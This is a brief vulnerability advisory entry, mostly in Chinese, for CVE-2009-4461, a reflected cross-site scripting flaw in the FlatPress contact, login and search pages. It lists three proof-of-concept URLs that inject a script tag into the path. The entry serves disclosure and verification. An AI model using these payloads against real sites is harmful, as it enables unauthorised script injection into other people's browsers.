FlatPress Cross Site Scripting Vulnerability CVE-2009-4461 CNNVD-200912-400

4.3 AV AC AU C I A
发布: 2009-12-30
修订: 2009-12-30

#### 1. 漏洞成因 在contact.php、login.php、search.php页面中对输入的转义处理不恰当 #### 2.漏洞验证 ``` http://server/flatpress/contact.php/>"><ScRiPt>alert(test)</ScRiPt> ``` ``` http://server/flatpress/login.php/>"><ScRiPt>alert(test)</ScRiPt> ``` ``` http://server/flatpress/search.php/>"><ScRiPt>alert(test)</ScRiPt> ```

0%
当前有2条漏洞利用/PoC
当前有1条受影响产品信息